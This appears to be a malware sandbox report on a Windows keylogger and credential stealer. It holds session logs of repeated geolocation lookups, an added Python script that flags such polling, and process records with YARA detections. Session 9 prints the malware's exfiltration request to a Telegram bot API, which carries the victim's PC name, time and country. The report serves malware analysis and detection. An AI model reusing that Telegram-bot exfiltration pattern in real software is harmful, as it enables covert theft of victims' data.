                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.9  49695        104.21.96.1     443               7072  C:\Users\user\Desktop\XFo9jVGyLQ.exe
Timestamp                Bytes transferred  Direction  Data
2025-03-07 22:22:35 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-03-07 22:22:35 UTC  851                IN         HTTP/1.1 200 OK
                                                       Date: Fri, 07 Mar 2025 22:22:35 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 147537
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTWPO2CoePJ2QoltdOGrsTIHQhkWVHAstPxKVfDy0QBvcKykRrtXiBiq0%2FIO4ZQAn3R3DJTtSQPOzP9pZ62W9EYygddvQO5DFjKbRrVH1hplxNmHtJW28yX31602yPTl0BYvFgDa"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 91cd7e1008717073-ORD
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=41222&min_rtt=40239&rtt_var=13052&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=64554&cwnd=97&unsent_bytes=0&cid=78a4b624a866e4b5&ts=639&x=0"
2025-03-07 22:22:35 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
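
Sessions 0 to 6 are the same request repeated every three to four seconds from new source ports: GET /xml/8.46.123.189 to reallyfreegeoip.org, asking for the geolocation of the public address the sample learned from the earlier "Current IP Check" response, and none of the requests carries a User-Agent header. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses requests laid out like these sessions, flags the three observables visible here (an IP-lookup host, a /xml/<ip> geolocation query, a missing User-Agent), recovers the country code from the truncated XML body with a per-tag regex instead of an XML parser (xml.etree would reject the body, which the report cuts off mid-tag), and reports the tight repetition as polling. The session records are constructed to mirror sessions 0 to 6 plus one benign request; every entry in IP_LOOKUP_HOSTS other than reallyfreegeoip.org, the polling thresholds and the benign host are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Hosts whose only purpose is to tell a client its public IP or geolocation.
# reallyfreegeoip.org is the one shown in the report; the other entries are
# assumptions and should be tuned to what your environment considers normal.
IP_LOOKUP_HOSTS = {"reallyfreegeoip.org", "checkip.dyndns.org", "api.ipify.org", "ip-api.com"}

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
GEOIP_PATH = re.compile(rf"^/xml/(?P<ip>{IPV4})$")      # reallyfreegeoip.org/xml/<ip>
GEO_TAG = re.compile(r"<(IP|CountryCode|CountryName|RegionCode|City)>([^<]*)</\1>")
TS_FORMAT = "%Y-%m-%d %H:%M:%S UTC"                      # timestamp column of the report

# Constructed records in the shape of the report's session table:
# (session id, timestamp, source port, raw request, response body).
GEOIP_REQUEST = (
    "GET /xml/8.46.123.189 HTTP/1.1\r\n"
    "Host: reallyfreegeoip.org\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Cut off mid-tag on purpose: the sandbox truncates bodies exactly like this.
GEOIP_BODY = (
    "<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n\t"
    "<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n\t"
    "<City>New York</City>\n\t<TimeZone>America/New_York</TimeZo"
)
SAMPLE_SESSIONS = [
    (sid, f"2025-03-07 {hms} UTC", port, GEOIP_REQUEST, GEOIP_BODY)
    for sid, hms, port in [(0, "22:22:16", 49684), (1, "22:22:19", 49685),
                           (2, "22:22:22", 49687), (3, "22:22:26", 49689),
                           (4, "22:22:29", 49691), (5, "22:22:32", 49693),
                           (6, "22:22:35", 49695)]
] + [
    # Benign negative case (constructed): browser-like request to an unrelated host.
    (8, "2025-03-07 22:22:40 UTC", 49699,
     "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
     "<html><body>hello</body></html>"),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def classify_request(req):
    """Indicators a single request trips; all three fire on the sample's traffic."""
    flags = []
    if req["headers"].get("host", "").lower() in IP_LOOKUP_HOSTS:
        flags.append("ip-lookup-host")
    if GEOIP_PATH.match(req["path"]):
        flags.append("geoip-query-for-ip")
    if "user-agent" not in req["headers"]:
        flags.append("no-user-agent")
    return flags


def extract_geo(body):
    """Recover geolocation fields from a possibly truncated XML body: every
    complete <Tag>value</Tag> pair is kept, the cut-off tail is ignored."""
    return {name: value for name, value in GEO_TAG.findall(body)}


def analyze(sessions, min_hits=3, max_median_gap_s=10.0):
    """Flag each request and report repeated lookups of the same host/path
    whose median inter-request gap is short enough to look like polling."""
    requests, timeline = [], defaultdict(list)
    for sid, ts, _sport, raw_request, body in sessions:
        req = parse_request(raw_request)
        host = req["headers"].get("host", "").lower()
        flags = classify_request(req)
        requests.append({
            "session": sid, "host": host, "path": req["path"], "flags": flags,
            "geo": extract_geo(body) if "ip-lookup-host" in flags else {},
        })
        when = datetime.strptime(ts, TS_FORMAT).replace(tzinfo=timezone.utc)
        timeline[(host, req["path"])].append(when)

    beacons = []
    for (host, path), times in timeline.items():
        if host not in IP_LOOKUP_HOSTS or len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        if median_gap <= max_median_gap_s:
            beacons.append({"host": host, "path": path, "hits": len(times),
                            "median_gap_s": median_gap})
    return {"requests": requests, "beacons": beacons}


if __name__ == "__main__":
    result = analyze(SAMPLE_SESSIONS)
    for r in result["requests"]:
        print(f"session {r['session']}: {r['host']}{r['path']} {r['flags']} "
              f"country={r['geo'].get('CountryCode', '-')}")
    for b in result["beacons"]:
        print(f"POLLING {b['host']}{b['path']}: {b['hits']} hits, "
              f"median gap {b['median_gap_s']:.1f}s")
```

Run stand-alone it prints one line per request and one POLLING line for reallyfreegeoip.org; in practice the records would come from the decrypted sessions of a report like this one or from a proxy log. The per-request flags alone are noisy (plenty of legitimate updaters omit a User-Agent), which is why the polling check requires both an IP-lookup host and a short median gap across several hits before it reports anything.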


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                7 | 192.168.2.9 | 49697 | 104.21.96.1 | 443 | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2025-03-07 22:22:38 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:38 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:38 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147539
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj8VooYW4oityYEejfTWfdsXednB66y6HewykbyqgGRzQcHfaReVP7g3MRMdFvi%2B9jZGhWE%2FN8FGp4UJhcPAUjlKiPmNfPjWXPzKQ3foGKi6EVffCpYXi6cRto0GqaWH7NTYUyvX"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7e22681d7073-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=50410&min_rtt=42364&rtt_var=19052&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=67971&cwnd=97&unsent_bytes=0&cid=296984819ba6c951&ts=561&x=0"
                                                                                                                2025-03-07 22:22:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                8 | 192.168.2.9 | 49699 | 104.21.96.1 | 443 | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2025-03-07 22:22:41 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:41 UTC | 862 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:41 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 147542
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65EzhfO26%2BpklOuanMD7aCp%2BqXJriIu%2Bc08rHL2r0XLoqg1YL5KSkW1tLjOCfDhd3LtT3y%2FWKUbV0pDCVEa3%2Bpc8WVAOWJ0yum9%2FzbLlpXndZeet191MRkf5E1V6fn6Z145curfz"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 91cd7e34ff65026c-ORD
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=39459&min_rtt=37775&rtt_var=13574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=63804&cwnd=180&unsent_bytes=0&cid=8d9940aee0fb0a8e&ts=641&x=0"
                                                                                                                2025-03-07 22:22:41 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                9 | 192.168.2.9 | 49700 | 149.154.167.220 | 443 | 7072 | C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2025-03-07 22:22:43 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-03-07 22:22:44 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 07 Mar 2025 22:22:44 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-03-07 22:22:44 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Target ID:0
                                                                                                                Start time:17:22:11
                                                                                                                Start date:07/03/2025
                                                                                                                Path:C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                                                                                                                Imagebase:0xe70000
                                                                                                                File size:773'120 bytes
                                                                                                                MD5 hash:414A4CCE996061C8F67088E96B9E5745
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:17:22:12
                                                                                                                Start date:07/03/2025
                                                                                                                Path:C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                                                                                                                Imagebase:0x6b0000
                                                                                                                File size:773'120 bytes
                                                                                                                MD5 hash:414A4CCE996061C8F67088E96B9E5745
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:low
                                                                                                                Has exited:false
